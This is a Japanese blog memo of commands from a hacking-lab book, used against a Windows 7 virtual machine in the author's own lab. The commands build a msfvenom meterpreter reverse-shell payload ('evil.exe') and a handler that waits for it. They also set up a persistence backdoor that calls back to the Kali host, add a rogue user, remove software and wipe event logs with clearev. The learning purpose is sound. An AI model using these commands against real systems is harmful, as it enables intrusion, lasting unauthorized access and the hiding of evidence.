![見出し画像](https://assets.st-note.com/production/uploads/images/58974055/rectangle_large_type_2_1116ff53d0bb16780e3835cd93ec7bf3.jpg?width=800)
【ハッキングラボ】windows7へのハッキング編【コマンド備忘録】
0. はじめに
最近セキュリティに関して興味が沸いてきまして,ハッキングについて少し勉強しました.
そこで,ハッキングラボという書籍に出会いました.少し前まではkindle版は無かったのですが,気づいたらありまして即ポチってしまいました.
連休ということもあり,メインで進めている企画が落ち着いてきたこともありハッキングを実践してみました.そのメモとしてコマンド等を残しておきます.
と言うのも,こちらの書籍,コピーが上手くできず,変なスペースが入ったり余分な文字列が入ったりと思ったよりも厄介なんですね.そのための備忘録代わりのメモになります.
また,ネットワークやOSの環境構築など,こちらの書籍のみでは完結しない部分がありました.
この辺りのフォローと私の独自のやり方をプラスアルファした内容を後日動画にて配信する予定ですので,チャンネル登録などをして頂けると嬉しいです.
1.0 ネットワーク環境構築
1.1 ホストOSとハッキングOSの設定
ホストOS:仮想マシンを実行する大本のwindows10のこと
ハッキングOS:ハッキングに特化したkali linuxのこと
▼ホストOSはこちらの設定
C:\Users\masaki>ipconfig
Windows IP Configuration
.....
Ethernet adapter VirtualBox Host-Only Network #2:
Connection-specific DNS Suffix ことを
Link-local IPv6 Address . . . . . : fe80::b915:7354:4ed4:cb3b%10
IPv4 Address. . . . . . . . . . . : 192.168.56.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
▼ハッキングOSはこちらの設定
root@kali:/home/masaki# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe21:8e63 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:21:8e:63 txqueuelen 1000 (Ethernet)
RX packets 54 bytes 21399 (20.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55 bytes 7192 (7.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.111 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::a00:27ff:fede:28c9 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:de:28:c9 txqueuelen 1000 (Ethernet)
RX packets 15740 bytes 1726348 (1.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 19518 bytes 7851645 (7.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
まずは,この2つがPINGで通信できることを確認.
さらに,ハッキングOSでインターネットに繋がることも確認.インターネットに繋がらないとパッケージの更新などが出来ずに詰むので必ず設定しよう.ここで一回やらかしてkali linuxを入れ直しました.....
ここまででもけっこう大変だった.
1.2 侵入されるOSの設定
今回はwindows7に侵ことをことを試みます.
なので,先ほどのOS達と同じネットワークに配置します.さらに,こちらのOSもインターネットに接続できるようにしておきましょう.
▼侵入されるOSはこちらの設定
C:\Windows\System32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 3:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::41ce:1f58:169a:6f9f%16
IPv4 Address. . . . . . . . . . . : 10.0.3.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.3.2
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::256b:4013:4140:453f%15
IPv4 Address. . . . . . . . . . . : 192.168.56.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
3台でそれぞれのPCにPINGが通ればネットワーク環境の構築は終了です.
2.0 簡単な通信
ハッキングOSと侵入されるOSとで,簡単な通信を行います.
今回はNCコマンドを用いて簡単なチャットをやってみます.
▼ハッキングOS
root@kali:~# nc 192.168.56.101 5555
▼侵入されるOS
C:\Work\nc111nt> nc.exe -lvp 5555
3.0 シェルを奪う
簡単に言うと相手の制御(管理者権限)を奪うということです.
これができれば,相手のPCに勝手にユーザーを作成することや,アプリを勝手に削除することも可能です.
3.1 バインドシェル
NCで待っている侵入されるOSにハッキングOSはアクセスすることで相手の制御を奪います.
3.2 リバースシェル(NC)
バインドシェルとは逆で,NCで待っているハッキングOSに侵入されるOSがアクセスすることで相手の制御を奪います.
しかし,そんな簡単に外部にアクセスしてはくれません.
そこで,ドラマとかでよく見るファイルを開いたら勝手にアクセスしてしまうように仕込んでおいて,相手の制御を奪うやり方をやっていきます.
3.3 リバースシェル(Metasploit)
▼ペイロードの作成
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.111 -f exe -o /root/Desktop/evil.exe
▼apache2でペイロードを公開
root@kali:/var/www/html/share# service apache2 restart
▼ペイロードからのアクセスを待ち受ける
msf > use exploit/multi/handler
msf exploit( multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit( multi/ handler) > set LHOST 192.168.56.111
show options
exploit
4.0 Metasploitで暴れまわる
ここからは,Metasploitをゴリゴリ活用して相手のPCにバックドアを仕掛けたりします.
4.1 run scraperは使えない
なぜかこの関数使えなくなってます.実際,作業の進行には影響はありませんので飛ばしましょう.
4.2 バックドアを作ってみる
相手の侵入されるOSが起動したら,ハッキングOSにアクセスしてシェルを渡してくれるようにバックドアを仕込みます.
こちらのコマンドで60秒おきにハッキングOSにアクセスするように設定します.
run persistence -X -i 60 -P windows/meterpreter/reverse_tcp -p 4444 -r 192.168.56.222
4.3 勝手にユーザーを作ってみる
管理者権限を奪えたので勝手に「evil‗user」とかいうユーザーを作成してみます.
ここまできたら,やりたい放題です.
4.3 勝手にアプリを削除
Microsoft .NET Framework 4.5.2を削除してみる
wmic product where name="Microsoft .NET Framework 4.5.2" call uninstall/nointeractive
無事に削除が完了しました.
4.4 侵入した痕跡(ログ)を削除
windowsでは,すべてイベントビューワーに痕跡が残ってしまうため,痕跡を消しておきます.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > claerev
[-] Unknown command: claerev.
meterpreter > clearev
[*] Wiping 303 records from Application...
[*] Wiping 640 records from System...
[*] Wiping 922 records from Security...
meterpreter >
これで痕跡を消すことができました.
5.0 おわりに
これでwindows7編は終了です.
次回はwindows10でやっていきます.
この記事が気に入ったらサポートをしてみませんか?